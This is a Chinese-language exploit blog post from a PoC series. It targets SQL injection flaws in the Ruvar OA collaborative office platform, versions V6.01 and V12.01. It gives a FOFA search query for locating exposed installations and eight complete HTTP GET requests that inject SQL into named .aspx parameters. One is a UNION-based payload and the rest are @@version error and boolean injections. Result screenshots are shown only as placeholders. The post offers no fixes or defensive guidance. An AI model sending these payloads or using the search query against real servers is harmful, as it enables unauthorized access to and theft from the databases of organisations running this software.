Pages

Menu

Babing
Published on 2024-08-30 / 1 Visits
0
0

R18-1Ruvar-OA协同办公平台-SQL

#Pocs

R18-1Ruvar-OA协同办公平台-SQL

漏洞描述:

该oa系统是广州市璐华计算机科技有限公司采用组件技术和Web技术相结合,基于Windows平台,构建在大型关系数据库管理系统基础上的,以行政办公为核心,以集成融通业务办公为目标,将网络与无线通讯等信息技术完美结合在一起设计而成的新型办公自动化应用系统。

影响版本:

RuvarOA V6.01 、RuvarOA V12.01

网站图片:

image.png

网络测绘:

fofa语法:

body=“txt_admin_key”

漏洞复现:

payload1:

GET /DepartmentPlan/department_plan_attach_download.aspx?sys_file_storage_id=%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2bCHAR%28106%29%2bCHAR%28118%29%2bCHAR%2898%29%2bCHAR%28113%29%2bCHAR%2873%29%2bCHAR%28107%29%2bCHAR%2866%29%2bCHAR%2881%29%2bCHAR%2871%29%2bCHAR%2889%29%2bCHAR%28114%29%2bCHAR%2888%29%2bCHAR%2871%29%2bCHAR%2876%29%2bCHAR%2866%29%2bCHAR%2890%29%2bCHAR%2886%29%2bCHAR%2874%29%2bCHAR%28109%29%2bCHAR%2898%29%2bCHAR%28106%29%2bCHAR%28107%29%2bCHAR%2885%29%2bCHAR%2871%29%2bCHAR%2877%29%2bCHAR%2899%29%2bCHAR%2885%29%2bCHAR%28103%29%2bCHAR%28118%29%2bCHAR%28101%29%2bCHAR%28120%29%2bCHAR%2874%29%2bCHAR%28117%29%2bCHAR%28109%29%2bCHAR%2865%29%2bCHAR%2882%29%2bCHAR%28105%29%2bCHAR%2876%29%2bCHAR%28102%29%2bCHAR%28120%29%2bCHAR%2887%29%2bCHAR%28101%29%2bCHAR%28105%29%2bCHAR%2884%29%2bCHAR%28113%29%2bCHAR%28118%29%2bCHAR%28113%29%2bCHAR%28118%29%2bCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

效果图:
image.png
payload2:

GET /filemanage/file_memo.aspx?file_id=@@version HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

效果图:
image.png
payload3:

GET /WorkFlow/wf_work_print.aspx?idlist=@@version HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate

效果图:
image.png
pyload4:

GET /WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

效果图:
image.png
pyload5:

GET /WorkFlow/wf_office_file_history_show.aspx?id=1%27%20and%20%28@@version%29%3E0-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

效果图:
image.png
pyload6:

GET /WorkFlow/wf_get_fields_approve.aspx?template_id=@@version HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

效果图:
image.png
pyload7:

GET /include/get_dict.aspx?bi_value=1&bt_id=1%29+AND+1248+IN+%28SELECT+@@version%29+AND+%282558%3D2558&bt_name=1&bi_name=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

效果图:
image.png
pyload8:

GET /LHMail/email_attach_delete.aspx?attach_id=@@version HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

效果图:
image.png

R20-1锐捷-统一上网行为管理与...
R17-1锐捷-RG-EW1200...

Comment